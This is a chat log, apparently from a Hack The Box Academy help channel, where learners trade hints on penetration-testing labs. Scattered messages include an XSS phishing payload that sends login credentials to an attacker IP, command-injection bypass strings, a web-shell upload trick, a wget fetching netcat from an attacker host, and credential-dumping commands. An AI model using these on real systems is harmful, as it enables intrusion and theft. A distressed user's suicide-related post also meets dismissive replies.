#modules
oh yeah right
Idk even what this server is for
Then why did you join
At this point
reading #welcome can help you figure that out
no but jokes aside, keep it relevant to topic
Sigh...I have to impersonate users in sql. That's painful.
OH
i remember this now..
Yup.
OH
sleep; otherwise you def might overlook things
Nah, u will see ima get it this time.
the mssql portion... it's a mess
Big balls.
it's a whole dang'ol mess
lemme get some water and I will sit my ahh down.
Can sm help me with this stuff?
just be sure to use the enumeration techniques to find all the info on that lab
gotta ask a real question first to get help
bringin this classic image back
modules in academy literally take you from zero to hero
I'm not sure what could possibly confuse you
it took me a while for this lab too; i think like a few hours to realize i was missing one thing from the sql part
the linux fundamentals module is probably the messiest module imho; it's kinda all over the place
sure but in his case he was already asking what this discord is about, which is explained in #welcome, and I'm pretty sure he hasn't tried to start any module
i'm just gonna call it a skill issue and move on
just remember fqdn is q.b.z
it doesn't include any /resource/location
q.b.z.
i mean yeah. for all the other modules with an fqdn i've found it
fqdn omits that last .
its just this one that is giving me issues
haven't done this module so couldn't tell ya
i'm about to go give myself brain damage by pretending to read english composition work
I don't think I've come across any software where the last dot matters, though I did read a hacker news post where the email was something like user@nl and people were confused.
cant be bothered rn
fqdn needs the last .
```
omitted and the labels are separated by dots ("."). Since a complete
domain name ends with the root label, this leads to a printed form which
ends in a dot. We use this property to distinguish between:
- a character string which represents a complete domain name
(often called "absolute"). For example, "poneria.ISI.EDU."
- a character string that represents the starting labels of a
domain name which is incomplete, and should be completed by
local software using knowledge of the local domain (often
called "relative"). For example, "poneria" used in the
ISI.EDU domain.
```
I don't recall coming across anything where that has mattered.
When I was doing the FQDN stuff on the footprinting module in DNS section it did matter.
I made the mistake of typing inlanefreight.htb.
When it was without the last dot.
^ that's likely what conditioned me
That's probably because you added it to /etc/hosts instead of using dns
yes; that's why i said mssql
i was not
well shit
i remember the pain
because it definitely hurt
China Numba One
verified now
for now
For now.
it's really just the mssql part that's a pain
bc it combines a few of the techniques
nvr mind
i bothered and got it
even tho i swear i've tried the same answer before. Prob forgot a space in the answer
mood
academy should strip spaces from the answer string before checking if it's correct or not
too many times i've fallen for that
I got the solution for the CRUD API in academy but it says my answer is wrong
nvm got it
http://10.129.53.203/phishing/index.php?url='><deTaiLs ONpoInTERENter+=+(confirm)()//>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.220/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();
lost as could be on this one, this should be right
Not sure why this command isn't working given that I created the ticket.
ls \academy-ea-dc01.inlanefreight.local\c$
"Perform the ExtraSids attack to compromise the parent domain. Submit the contents of the flag.txt file located in the c:\ExtraSids folder on the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL domain controller in the parent domain."
https://academy.hackthebox.com/module/143/section/1457
in host file?
the imageurl input box should not be there
Hello, I finished this step
I am stuck on the last question. Despite the filtering applied and the different account names found, nothing passes
run it on the domain controller
I will have to log in to one of the old users?
as user10
Thank you, I finished the Module
Hi, im doing web proxies and working on the /lucky.php question. im using the script while true; do curl -s http://83.136.253.251:54893/lucky.php?getflag=true; done | grep -e htb -e HTB -e { and i know you have to get "lucky" but ive made over 5000 requests so i think im flawed, any hints? thank you
is the -s option on curl making it so that the html isnt touching grep?
the -s just removes the progressbar or potential error messages, the content of the website still shows up
since its the webproxies module I assume they wanted you to use zaproxy to just resend it automatically a thousand times and then check the response size or something like that? Your script itself looks fine I think
thank you, i will continue to persist
I have sent about 10,000 requests
okay nevermind, I checked, your problem is that you aren't sending the right request
you are not sending the getflag=true in the way that the website does it when you press the button
modifying your command to send the request correctly you should get the flag within 2 seconds of it running
YES, i will goof around even more. thank you
goated
is it a bad thing if i dont understand everything 100% yet, like servers or internal networks?
im a beginner
No, it's not bad. On the contrary. Now you know what you need to work on.
Good afternoon friends. Can you give me a hint in
Introduction to White Box Penetration Testing: Assessing Skills
I have authenticated and found two potential entry points for "Eval Injection" /ping and /whoami (the program keeps freezing during testing).
Hey can anyone help me enumerate the Hostname of a mssql server
So far i have tried nmap scripts but got nothing from that
I am referring to the MSSQL footprinting module
It should work, recheck your nmap syntax and IP.
you can also use metasploit to ping mssql iirc
||--script ms-sql*||
mine isnt, trying to do the pivoting module
wtf lmao
im on the second chapter and target wont go up
so its not tht i think
the servers tend to shit the bed on the weekends
meh the Password Attacks module is mostly Windows
I have been trying to spawn a target for 15mins now, and I had problems earlier today + yesterday
@rustic sage I did that module 2 weeks ago and all the machines went up in like 20 seconds
it's a mix
yeah, im halfway through the module, at this point only 2 linux sections
linux comes back
@rustic sage ^ you don't see this?
message support then? try refreshing the page - logging out and back in
yes: green bubble bottom right
if you don't see it, you may need to disable ad-block
browser theme
that theme may also have not shown the target button
ctrl-v
Hello everyone, could I please have some guidance on this one? I need to submit the contents of the flag.txt file located on the Administrator Desktop of the SQL01 host. This is part of the AD Enumeration & Attacks - Skills Assessment Part II. I've attempted privilege escalation through PrintSpoofer to establish a named pipe. I used a Meterpreter reverse shell payload, which I uploaded to C:\Users\Public using certutil. This challenge is doing my a** in
ctrl+shift+v
pasting into a terminal requires the addition of the shift key
works for me
if you're using the pwnbox (in-browser vm) you may need to enable clipboard
what guidance do you need? sounds like you've got it figured out
I'm not getting the shell, might reboot the machine
anyone else having problems spawning targets on modules?
if printspoofer doesn't work try a potato
it's not that I'm not seeing the link to spawn the target, it's just that it won't spawn
the servers have been shitting the bed today
Yeah, I have been trying to spawn machine for 1 hour now. Restarted VPN, log out/login, nothing works. I guess we just have to wait
Im just reviewing other modules now and expanding my notes
ah, I see
It finally spawned
And it took 1min to do the exercise
Ah so not just me, thanks for the info
hi! I am trying to get the shell that i uploaded:
```
Content-Disposition: form-data; name="uploadFile"; filename="shell.php\x00.gif"
Content-Type: image/gif
```
but then i cant reach it from the url: /shell.php/x00.gif?cmd=id
Can anyone help? The \ character always gets replaced by / in the url
if the nullbyte trick worked then the file will simply be uploaded as shell.php
then you probably need to try something else
yeah thats what i am asking
bc this is my first time trying this kind of url and it looks suspicious that this character always changes to / in the browser
so what are you asking? if you can't access shell.php then the upload isn't successful
this module is the upload attacks type filters
no i changed it to jpg but it was .gif before
Just go to "{url}/shell.php"
?cmd={command}
i tried that
I used my voucher but I cant switch to CPTS, the voucher stays on CBBH, does someone know why?
did you buy a voucher or are you referring to the silver annual
i'd reach out to support
you can see what your file is uploaded as at the main page, like I said, if nullbyte doesn't work, try another way
Module: Cracking Passwords with Hashcat. Section: Cracking wireless... any clue on what im doing wrong?
i found the file
well this is not optional
find another way to make it work, check the whitelist filters section
Where on the academy platform can I watch the course?
alright fam
?
you might need to wait a day if you just bought the plan
yes I used the voucher 2 hours ago
then you may need to wait until tomorrow to switch it
but that doesn't mean you can't select another path
okey thx for tip
there also are no videos on most of the academy content
anything above tier 0 is against the rules to upload
On the website Idk where I need to go to follow the CPTS course
from the back of my mind, i think you need to convert to hc2200 file format
same error
How did you convert?
||./cap2hccapx.bin ../../Desktop/corp_question1-01.cap ../../Desktop/mic22000.22000||
I used cap2hashcat online converter, then like you did a 0 m2200 and rockyou
ill try that
When performing a DCSync with secretdump.py in this section (https://academy.hackthebox.com/module/143/section/1508) ...when prompted for a password ...what password would we use? I tried the one in the section and one with no password...neither case worked for me.
should be the same as the previous section
this way it prints fewer separator errors, but it still does it
cat output
You mean this section? https://academy.hackthebox.com/module/143/section/1489
ah you need to use v6.1.1
I remember the dev said this section is very outdated
thx god, much appreciated
I'll add it to erratum
attacking application with ffuf -> Sub-domain fuzzing, someone?
hello, can someone give me a hint on the advanced command obfuscation for bypassing the pipe (|)? i already tried ||bash<<<$(base64%09-d<<<fA==)|| and ||$(tr%09'!-}'%09'"-~'<<<{)|| but it's not working
i try to run ffuf with the subdomain1milion-5000 on the inlanefreight.com
and i get 4 response - www/ns3/blog/support
is the bash command blacklisted?
i think no
try with the common.txt wordlist
try bypassing with one of the methods shown in that section like ||b'a'sh||
i think it isn't blacklisted because when i tried to run ||bash<<<$(base64%09-d<<<fA==)|| it still works perfectly fine, but when i combine it with "grep root", i didn't get the path containing root only
so to be clear,
you unzip the file
cap2hashcat online convert the .cap file
download it (.....hc22000)
hashcat -a 0 -m 22000 .....hc22000 rockyou
i dont know what extension you use there hccapx, if i convert it its hc22000
I tried pwncat-cs to catch a reverse shell, but it says "channel unexpectedly closed" (it's working with netcat)
i think you are giving hashcat the wrong file
Hi, I have a quick question about the ATTACKING COMMON APPLICATIONS for PRTG Network Monitor module. I would like to brute force the password, but it is extremely slow, and I would like to understand why. When I use curl on the /public/login.htm page I get an almost immediate response, but when I try a curl of this type
the response takes a very long time. In addition, with burp, I notice a 302 Moved Temporarily when I test with my repeater.
i havent done this but maybe follow the 302 by -L
Hi, does anybody currently have problems with targets in Academy modules not spawning?
not by my knowledge so far, ill go ahead and spin up a target real quick
yea
Thanks. Pwnbox works Like a Charm...
target spawned
Okay, now it started. Seems to be a temporary Thing on my Side. Thanks!
Can I DM anyone regarding NTLM Relay attacks - skills assessment?
It shortens the response time, but it's still too long for brute force. Do you know if it is possible to follow the redirection with ffuf?
so it's the redirect that increases the response time?
hey guys... Do you have problems spawning target machines?
Password Attacks
PtH
i have problems understanding the question.
do they want me to:
- impersonate julian via PtH
- spawn powershell via PtH
- import Invoke-TheHash, but its already there in C:\tools
- make a reverse shell from DC01 to MS01?
am i getting this correct?
Look at some messages above. I had a temporary problem. After some waiting, it worked
ffuf can follow 302 by -follow iirc
Thanks, I will try
i dont know
might be latency issues, pings taking quite some time it looks like
Given the problems with the target machines at the moment, it is possible that the redirect increases the response time considerably. I'll try again when the boxes are better.
- Yes, You impersonate Julio via pth
- Launch PS to perform pth from MS01 host to DC01 host (connect first via rdp with Julio's hash)
- Invoke-The hash is a collection of PS functions for performing pth, to use the function we need to import the module that contains it.
- Yes.
Kindly reread that section.
ty
where comes the username from, svc_workstations? from a scan like mimikatz sekurlsa::logonPasswords?
Hi guys, is there somebody here who is really good at monitoring? I need a little bit of help. Some guys are monitoring me for being not normal in their opinion. They sit in the room behind me and read all the things I'm writing on my phone and have some videos of me; how is this possible? Antivirus doesn't find anything. Phone reset doesn't work, changed number, phone, country and so many things. Wherever I go. Is it a project or something? I'm not paranoid.
the third eye sees all
the third eye is also another ordinary eye
Serious ?
what do you think?
They are trying to bring me to suicide I think but I'm not doing this either.
dude ask the police
Everything they are doing is useless
yes itβs very similar to the fourth eye if you think about it
and get help
Police can't help, I'm in Russia, perhaps they will do the same
I'm from Germany and they filmed me there I think, then I went to Russia and they sent all this shit here
dude dont talk here lord putin is watching I wanna be on his good side in case of war
we talk about academy stuff here
maybe try asking a church
the fathers are well trained in this type of guidance
or whatever faith you use
sorry for assuming
I'm stuck on the AD Enumeration & Attacks Skills Assessment 1: I have 3 reverse shells, one is nc, one is metasploit, one to a different machine using metasploit. This is probably unnecessary but I hate losing shells. I have uploaded 3 different tools to kerberoast the user and none of them work. It is like they dont execute. I cant import-module, katz and rube fail to provide any output. What am I missing? Can someone assist in this?
Hi everyone. Is there a way I can verify my discord account with my HTB academy account? I checked under #welcome, but I only have HTB Academy, not "plain" HTB
make an account
which question
"Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer" is the question.
one of the ways is to import powerview, but wdym you can't import
Hi, when trying to spawn a lab at the end of a section I get stuck on Target is spawning... and it loads forever. Is there a problem with the servers or it's something in my side?
I type PS C:> import-module .\PowerView.ps1 and it hangs for a second but never imports. If I try any of the functions of PowerView nothing happens. I was able to get the account name using setspn.exe , I can load the ticket into memory, and validate that it is there using klist, but any of the tools I try to dump it fail
servers are slow
It's ten times worse than it is usually
If you can get the account name with Setspn, you have the answer to the question?
Password Attacks
PtH
last question
i cant get the reverse shell.
||
- RDP as julio
- start powershell as admin
- start powershell as admin for nc listener
- import stuff
- launch Invoke_WMIExec at target DC01, domain inlanefreight.htb, user julio, hash juliohash, command is base64 powershell for reverseshell at ip 172.16.1.5(MS01)
||
I'm sorry. I can answer question 2, but not able to get the hash to crack it.
use Get-DomainSPNTicket from powerview, if it didn't get imported correctly it will tell you the cmdlet is not found
I uploaded mimikatz with the webshell, then went for a reverse shell using msfvenom
or mimikatz yes
Then it was a matter of following section
PowerView wont load. MimiKatz will not load either, Rubeus will not load.
I have 3 reverse shells. My user is system. Not one of the shells nc or metasploit will work.
msfvenom with windows/shell_reverse_tcp payload
And output it to an exe
Works fine
I'll try that. Thanks
I mean even Get-DomainSPNTicket will work in the webshell
PS C:> Rubeus.exe kerberoast /nowrap
PS C:> Get-InstalledModule
PS C:> Get-DomainSPNTicket
PS C:>
PS C:> .\mimikatz_64.exe
PS C:\users\administrator\desktop> c:.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
PS C:\users\administrator\desktop> ls
PS C:\users\administrator\desktop> import-module PowerView.ps1
PS C:\users\administrator\desktop> Get-DomainUser * -spn
none are working
Mimikatz has been hanging for 35 minutes
From your last ss, why are you passing the hash for svc_workstations when the question specifies Julio?
My lad, you gotta escalate to root.
And grab the ticket.
It's in the /tmp/
Frankly svc_workstations is in the sudoers list.
So yk what to do.
"Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer."
I am having trouble finding the user bross. "||raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm||"
you have system on DC, need I say more?
i dont, it was just a question from previous ss
i use julio
but i am not sure why the reverse shell doesnt land on MS01
I looked at the Users on DC and I did not see bross
what did you use to look at the users?
Same, it still didn't spawn for me, over 20 minutes. Something happened today? Everything worked smoothly yesterday
You didn't catch the shell?
What's your output
i dont get any output, no PID whatsoever, i tried running command whoami, but that does not output anything, so its not the payload thats the issue, i think something else is wrong
i think i gonna restart the machine
Bet
I'll restart the victim and see if this clears up. Thanks for trying to help.
Module: Windows Privilege Escalation
Section: Skills Assessment Part I
I've gotten a reverse shell on the target, but I'm having trouble uploading tools to it. Here is the command I used: wget http://10.10.15.130:8080/nc.exe -UseBasicParsing -OutFile nc.exe
In the window on my attack box where I'm hosting the Python web server, I see the connection from the target (no error messages), but the file does not download (and I don't get any error messages on the target side either).
Good catch. That was just a typo on Discord though. I put the command in correctly on the lab.
that should work, the file will be downloaded to the current dir
Hmmm... It's not showing up in the current directory when I run dir, and I also ran Get-ChildItem -Path C:\ -Recurse -Filter nc.exe and got no hits.
Hi guys, is there somebody here who is really good at monitoring? I need a little bit of help. Some guys are monitoring me for being not normal in their opinion. They sit in the room behind me and read all the things I'm writing on my phone and have some videos of me; how is this possible? Antivirus doesn't find anything. Phone reset doesn't work, changed number, phone, country and so many things. Wherever I go. Is it a project or something? I'm not paranoid.
not the chat for this kind of stuff
where did you run the wget command and as what user
I landed in a reverse shell on the web server as what I believe is the web server's service account (iis apppool\defaultapppool) in the directory C:\windows\system32\inetsrv. That's the context in which I ran wget.
anyone know how long the average -p- scan takes
might not have perms to write in that dir, try /temp or /users/public
Yep, that did the trick. Thank you!
I was assuming that any time I'm dropped into a shell as a certain user, I will have write permissions to that directory. Really helpful to know that's not the case.
nah, you can have a shell drop you at /windows/system32 as a standard user, just depends on how the shell is configured
always safer to use a global writable dir
On a related note, is there a way to upgrade a Windows reverse shell to a shell with more features (such as tab completion and showing error messages) in the same way that we can with a Linux reverse shell? It would have been helpful in this case to see error messages saying I don't have adequate permissions.
conptyshell
most shells will show you error messages, it's only those oneliners that don't
I basically waited 2 days for a nmap scan
both are TCP
-sT completes the 3 way handshake
-sS is sending SYN and the server sends SYN-ACK or RST (so no complete Handshake)
UDP is -sU
what is the ACK
acknowledge
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
yeah
I need to learn sA, sW, sM
try the module NMAP
I'm on it right now. that's why I asked about the options. My nmap scan is taking too long for my patience
at least I only have 3% to go
In a real pentest wouldn't you always use -p-
Have you ever run into this error with conptyshell? No matter what keys I enter, it just outputs the prompt over and over.
"Perform a full TCP port scan on your target and create an HTML report. Submit the number of the highest port as the answer."
why upgrade? Just run it directly
So would I search for hashes of the user bross once I am on DC.
ntds
hey g
yeah I dont know I am not even able to log in
I was doing a lab and my ssh connection cut out
Whenever I get a new target, I always run two nmap scans (there may be a better way, but this has never failed me):
sudo nmap -p- -T5 <target>
sudo nmap -A -p[ports output from the above scan] <target>
Adding the -T5 flag to the full tcp scan really speeds it up. There may be reasons this is not a best practice, in which case I hope someone will correct me.
t5 is fine if your connection to the target is good, I usually use t4
for double pivots I'll slow it down even more
||ntds.dit? Something similar to this command: "/usr/local/bin/secretsdump.py -ntds /home/htb-ac-767577/NTDS.dit -system \Windows\System32\config\SYSTEM"||
That isn't working either for some reason.
yep, you need to save a copy of ntds and system hive
are you running it on the target
Yes, the target is the box I have the PowerShell session on in the second screenshot.
also, you have the DA hash, you can just dcsync with that
Lol good point. Looks like it doesn't. I'll get on with the non-tricked-out shell then. I really appreciate your help.
has anybody been having issues spawning the "Target" machine?
yes
... you can host it on your own http server
and all targets don't have internet
im giving up for today, waiting 1:30h for target
My page has been loading for +20min which usually takes 30sec max to load
same issue network error + machine unreachable
Alright, I got it working. Thanks!
Hi, my target never spawns, it just sits there for a while. I rebooted my pc but nothing changed and my network config is ok.
Same here going on 20 mins
Sweet
I'm not sure if this type of question goes in this channel but i'm starting and i would like to know if starting with the Information Security Foundations is a good option.
I am now having this issue too
Here too no target is spawning
if you're new, yes
ty
Not gonna lie, I don't do anything, just wait and the ip appear
did yours ever appear?
mine did not
yep, right now is working well
try restarting your pc, maybe it works or at least works for me
The HTB server as I understand is atm not functioning as it should.
what's going on , with the servers today ?
broken
Man, cme is such a cool tool
netexec is cooler
yep, that's where all the active cme devs are at
afaik it's just an alternative for cme, since cme is not supported anymore
nope, like I said, that's where all the active cme devs are at
I guess you can consider it an alternative that's updated with new features
okay that's cool
ima have a look on it
literally its the same tool renamed because of drama, and all future updates will be in that fork
ah ok
Need assistance with Password Attacks -Network Services (RDP) I was able to get the username and password but cannot RDP into the target to complete the task.
can't spawn the target of Dynamic Port Forwarding with SSH and SOCKS tunnelling
what can I do?
my machine spawned
i am on intro to the elastic stack, i click the instance, i spawn the target, but i dont see anything to do with kibana or elastic stack in the instance itself. could anyone help with what i might be doing wrong?
is it possible that the payload is too long?
length shouldn't matter
though i swear there's a decoding step that needs to happen
in the example there is no decoding
not sure what could go wrong here
I went back to my old notes on the NTDS.dit database on how to extract password hashes and the first thing it tells me to do is type this command to copy the c drive: vssadmin CREATE SHADOW /For=C:
But this command doesn't work for my particular machine:
Would I have to try external tools or are there other internal tools that I need to try instead?
your link shows a different module entirely
try doing the commands listed in the section you linked first
That's the module that I meant to copy. I tried out all those commands suggested in the section and it led me to the DC machine. I know that the DC machine has the ntds.dit ...the directory tree that has all of the system's password hashes
omg i found the reason why it won't work
there's also lsass and other types of things you can use for password hashes i.e. creating a copy of the SAM/SAVE HKLM
dumping the lsass process
i was in the folder Invoke-TheHash, and i was executing the command with .\Invoke-.....
the .\ was the fault
omg all these hours
DNS; think what that stands for
root.inlanefreight.htb is just the admin (root@inlanefreight.htb) iirc dns uses a . to replace characters
I found this too and tried both ways but none worked
does it have something to do with the ||ptr record?||
It's way simpler than you think. Look at the ones with 127.0.0.1 and apply brain
Anyone else having issues spawning labs? Doing the Attacking Enterprise Networks Module and its been spawning for minutes.
do any modules have cryptography analysis ?
outside of like standard brute forcing
Hey guys I am going through the Service and Process Management section in the Linux Fundamentals module. I am asked to launch OpenSSH using systemctl start ssh. When I do I get
Authentication is required to start 'ssh.service'.
Multiple identities can be used for authentication:
1. Debian (debian)
2. ,,, (htb-ac-1137339)
Choose identity to authenticate as (1-2)
What password are they asking for for each option? I tried my account password and the default password for ParrotOS but nothing worked and I get "Failed to start ssh.service: Connection timed out
See system logs and 'systemctl status ssh.service' for details." What should I do ?
Have you tried something like admin1 or password1?
I'm surprised it doesn't say in the module
The password for ssh is on the pwnbox desktop, you aren't really required to start any services, and ssh is already started on the pwnbox
For the in-browser vm (pwnbox) the password is randomly generated and is located in a file on the desktop
yeah I was thinking that because when I checked the status I saw that it was already "active". Thanks!
I also generally suggest using your own VM instead of the pwnbox
More control over the environment and versions of tools
okay I will do that
Could anyone give me some hints on ad assessment part 1? I'm looking for the other user with a clear text password.
anyone else doing Windows Priv Esc modules and unable to spawn target?
I know that I use tools like secretsdump.py to extract the hashes from the ntds.dit database...but right now I am having trouble downloading/copying the ntds.dit database to the attacking machine.
vssadmin won't work since that's only available on windows server machines from what I have learned
Yesterday I faced same problem in web attacks
Got fixed after few hours
How much have you progressed to that?
Is there an easier way to copy a hash value into notepad?
"Hashfile 'ilfreight_asrep' on line 1 ($krb5t...4B024C372D9E07319F47341B871F718C): Signature unmatched
No hashes loaded."
Correct me if im wrong guys, But arent source ports above the 49k range?
iirc, Rubeus has a -Format option that you can use to directly output Kerberos tickets in a format compatible with hashcat
Use mimikatz
Is there any quicker way to do a scan of all ports (-p-)? The ETA was a few hours, however my pwnbox (VPN) only has 2 hours of life per day and I need to find a source port for the particular section I am on. Any suggestions?
When I do -F it only has 2 ports 22/80. It seems I may need some sort of source port in order to do the NCat Command.
still facing connecting problems with labs ...
+++
Target is spawning for ever
I switch to another server , it looks fine now
How do u switch targets server?
you will find it before the question of the section
Pwnbox works fine, but targets won't spawn
-F scans the top 100 ports, -p- scans all ports, I'm sure there's a balance between that
That is the pwnbox servers
switch vpn server
there's also vpn server
academy 1
academy 2
.....
I don't even use vpn I use pwnbox
well switch pwnbox vpn
Still, target is spawning
What is even the relationship between spawning the target and the Pwnbox anyway
your vpn sets where the target server is; pwnbox automatically switches the vpn
Hi. I'm working on the Broken Authentication Assessment and I'm stuck. I have the credentials for the support user and the corresponding cookie. I've decoded part of the cookie but can't decode the other part. I've tried tampering with the part of the cookie I can control and set it to admin but that failed to give admin rights. I don't know what to do. Could someone give me a hint?
I am doing the nmap room in htb academy and for some reason my nmap scans wont go through any suggestions?
And the target spawning is also very slow any tips to make it faster?
There has been an issue since yesterday with the target spawning
@red kraken Not really, I have tried many things but the problem is on their servers so we can't really do anything. Hopefully they'll fix this tomorrow
thanks
got it thanks yeah hopefully they fix it
guys i wanna learn hacking can someone teach me
Get on HTB Academy and start learning
Hi Team, unable to start the target. stuck at Target spawning. Any suggestion?
Same
@silent oriole No, I have tried many things but the problem is on their servers so we can't really do anything. Hopefully they'll fix this tomorrow.
Hopefully. Thanks mate.
just start
Same here. I've tried changing my VPN location, clearing browser cache and I've contacted support. So far no response.
I've gotten a response:
Hello there,
We are currently experiencing intermittent issues with spawning that is affecting all platforms. In cases where it is possible, switching your VPN region may help, but otherwise please be advised we are working to resolve this issue as quickly as possible.
Please check back on Monday as we expect the issue to have been resolved by then. If it still persists, please feel free to reach back out.
decode the cookie
you still have the issue? I have it as well
same here
Fair enough. Thanks.
It started yesterday, and hopefully be fixed by tomorrow
Kinda feel bad for them lol
lol
I have a dumb question about the "Active Directory Enumeration & Attacks".
I started the enumeration and was looking for records on inlanefreight.com, but couldn't find anything. I remembered from a previous DNS module that I found a flag that the module didn't accept at the time. But I wrote the command and response down and still had the flag in my notes. So I just tried to submit it and it was correct. Today however, when using the same command, I don't get the flag as the answer.
I just used "dig any inlanefreight.com". Any ideas why it's not working this time?
Because the module asks for it.
Inlanefreight.com isn't a part of ad enum? AFAIK maybe inlanefreight.htb
No 100% .com in the question
What section?
External Recon and Enumeration Principles
I remember in the previous module i did it wrong by using the wrong domain, but this time it asks for .com not .htb
not .local?
"While looking at inlanefreights public records; A flag can be seen. Find the flag and submit it. ( format == HTB{******} ) "
Or am i stupid now?
But with .com i got the flag like a week ago
I still have the output in my notes
Have you tried changing server location for your vpn
Read the last paragraph of that section
But yeah that's weird
It does say inlanefreight.com
But any is a query that may not return anything
I know, but I'm still curious why it worked a week ago and now it doesn't. Because the flag from a week ago from .com was accepted as the correct answer
what command did you use?
inlanefreight is on htb servers i guess
the .com domain isn't
Ah ok, that might be it
Bro the flag is right there
yeah lol
I know, i have the flag and submitted it
thats not my question
hih lol
my question is, why it worked a week ago and now it dont
Delete this btw
It does
I just ran it lol
What is the use of --local auth in crackmapexec ?
In AD module (Internal Password Spraying - from Linux) it is given as The --local-auth flag will tell the tool only to attempt to log in one time on each machine which removes any risk of account lockout. Make sure this flag is set so we don't potentially lock out the built-in administrator for the domain
What if the host is not domain joined? Could someone please explain in detail about this?
Try to specify a known dns server, remember that this domain isn't on the htb servers but a public one.
You can also view the records of this domain using BGP Toolkit because it's a public domain
nah, went to do the OSCP labs
Sorry, got it now. Deactivated my personal VPN and now it worked. Sorry for the confusion
At least i can see that notes are valuable
Good evening everyone and happy new year I would like to know if it is possible to give cubes to another user on HTB Academy
No
Hey everyone, is this the right platform to ask doubts or should I use the HTB forum ?
Okay thank you very much
Doubts about? (Also the proper word is question)
Yup question is the right word. Question about concepts learnt in the modules.
Guys, in CROSS-SITE SCRIPTING (XSS) - Phishing module
When I click on spawn the target button, it's going to loading for ever
Faced the same issue?
It just depends on the question
Everybody is facing spawning issues
Like this for example
Only this module - section, all rest are fine
local account vs domain account
Any idea how to address it?
It tells cme that you're asking it to authenticate on a local account, not a domain account.
Change vpn region?
Oh got it . Thanks
I did not launch the VPN yet,
OK? That's somewhat not what I'm meaning
The vpn region dictates where the target spawns
Meaning changing it updates where it should spawn, you'd just need to download a new vpn file
Got you, let me have a try
Can't even imagine what support is gonna come back to Monday lol
stuck on this question, not sure if I need to crack the password or if I did crack it in other modules : Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
I've used mimikatz to get the NTLM and SHA1 hash but I cannot crack them. I've also tried Snaffler and LaZagne but none of them can give me the cleartext password
I've used mimikatz but I can only get the uncrackable hashes
there's a cleartext password there, look closer
You mean with mimikatz?
yep
I'm using sekurlsa::logonPasswords
if it's windows you can mount a drive with xfreerdp https://www.mankier.com/1/xfreerdp
Is this the right way?
I couldn't find the clearpassword in the output of this. Should I look closer the output or I should do something else?
I don't remember which option it is, but it's in there somewhere
Thank you so much! I will dig deeper with mimikatz
why not?
If you mount a drive: it's super easy
Seems working, thanks!
check the link I sent, mount the drive, and you will see a network drive when you open my computer
Hello, everyone. Could you please assist me with the "Injection Attacks" assessment?
Anyone else having trouble spawning the academy machines?
-F doesn't seem to get any source ports, I only get the 2 ports in return (22/80) and I believe I need a source port to connect to, in order to receive the version of the service the target is running, so I've been trying -p- to scan all, however that can take hours. Any suggestions on how I can speed that process up?
the default scan is top 1000 ports, which should be enough most of the time, if you need to scan all ports, use a timing template or set the min rate, the nmap module also goes through this
https://nmap.org/book/man-performance.html
https://nmap.org/book/performance-timing-templates.html
Got it thank you!
yes, sometimes
In the password attacks module, network services section, is there a way to make crackmapexec only enumerate usernames then passwords or am I stuck with this usernames_wordlist.length × password_wordlist.length number of connections?
Msfconsole also seems to be using the same n × m instead of n + m
what do you want it to do? try first user with the first pass, second user with the second pass etc?
No
Try all users with one pass
And if one user exist on the system but that pass was wrong it would still alert
then just give it one pass?
It will prompt the same output even if the user exist
I'm not sure what you're trying to say here, send a screenshot maybe
you mean like the -u flag in Hydra for example (https://academy.hackthebox.com/module/57/section/487). I don't know if it's possible in crackmapexec. I quickly checked the documentation and I didn't find it
I am doing the ADCS module, but cannot seem to spawn the lab
Is there some stability issue currently?
there are some problems spawning labs today. I managed to do it after some retries and waiting some time.
Ah, thanks. That is too bad
same prob here
Even when the box spawns, then I cannot connect to the machine
works now for me
works sometimes, but if it works i can also connect
hi everyone
anyone know how i can get my hackthebox account to show my progress on github, just for employment purposes
is there a chat where i can ask for help to try to solve a skill check on a module?
offtopic there are htb badges you can include as a js snippet
Simply include the following snippet to the location of the web page you want the badge on!
<script src="https://www.hackthebox.eu/badge/<userid>"></script>
If you need a static image link of the badge you can use the following snippet:
<img src="http://www.hackthebox.eu/badge/image/<userid>" alt="Hack The Box">
thanks, where is a channel related to this?
hey i am doing an academy module, "getting started". I am at the section where i have to escalate my privileges to get to the root user, i am at user 2 which is the step required before and am kinda stuck
check hidden directories where you might find some keys
which command?
I need a password or something i think for user 2. im not sure
i was able to manage the first one.. should getting into root be similar to user 2?
nope, use the hint that I gave
im stuck on the same module xD but a few sections behind that
holler if you need help
im doing the metasploit exercise, but im having trouble setting the options
already did xD
i already got the flag for user 2 im trying to get the root user access to get that flag
I know, look for hidden directories where you might find some keys for root
read the past part of that section
Attacking common services lab-easy, I have uploaded the webshell but cannot do anything with it besides listing files. can somebody point me in the right direction please?
hmmm
ok i see that. just a little confused how i use that key.. it doesn't seem to let me
did you chmod?
url encode your commands
oh with the public key?
nope, use the private key, chmod it, then -i to use
you need to copy it from the terminal, write it to your system (with vim or nano, whichever you like), chmod it, then -i to use
vim is not a flag, it's a text editor, same as nano, when you use vim fileName it opens a new file fileName for you to write to
or do i use vim id_rsa like the example?
yes
why would i not vim the key?
what do you mean?
are you using that in the ssh session?
i think so
2 things here: user2 is your current user, getting the key for that user wouldn't get you to root. find another key elsewhere that will
if the key exists in the target, can you use it? create the file in your own system, then ssh in
i know the user 2 wont get me to root...
err flag i mean
ok so another key...
would gobuster be beneficial?
no. where would the key for root be located?
in user 2?
or even in the root user
but i cant get access to the root user
something about not knowing the password for user 2
look up where is root's home dir
Therefore, the home directory for the root user is in the path of /root.
is what i got
So are any of you going to tryhackme until the spawn machines at HTB work again?
found the key that you need?
working fine for me on US academy 3
should i take notes about the fundamental modules?
not working at all here EU academy 1
I take notes on all my modules
no...
combine the information you have, you know root's home dir, you know where the keys are usually located
yes i understand that but i cant access root unless i am logged in as root
im back at user 1 level
get to user2
taking notes is key to success
damn target is not spawning
user2 can access things that they otherwise shouldn't
ok ill go back to user 2
